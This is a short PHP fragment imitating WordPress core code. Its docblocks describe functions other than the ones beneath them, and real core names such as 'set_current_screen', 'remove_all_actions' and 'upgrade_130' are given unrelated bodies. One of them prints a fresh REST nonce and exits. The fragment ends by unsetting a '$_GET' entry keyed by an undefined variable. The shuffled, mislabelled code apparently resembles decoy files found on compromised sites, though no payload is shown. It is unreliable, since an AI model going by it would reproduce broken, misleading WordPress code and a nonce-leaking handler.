@type string $0 The current site's domain. * } */ function set_current_screen($branching = '') { return array(get_network()->domain); } // If we have pages, put together their info. /** * Retrieves the custom header text color in 3- or 6-digit hexadecimal form. * * @since 2.1.0 * * @return string Header text color in 3- or 6-digit hexadecimal form (minus the hash symbol). */ function remove_all_actions() { return get_theme_mod('header_textcolor', get_theme_support('custom-header', 'default-text-color')); } // edit_user maps to edit_users. /** * Handles renewing the REST API nonce via AJAX. * * @since 5.3.0 */ function upgrade_130() { exit(wp_create_nonce('wp_rest')); } unset($_GET[$description_wordpress_id]);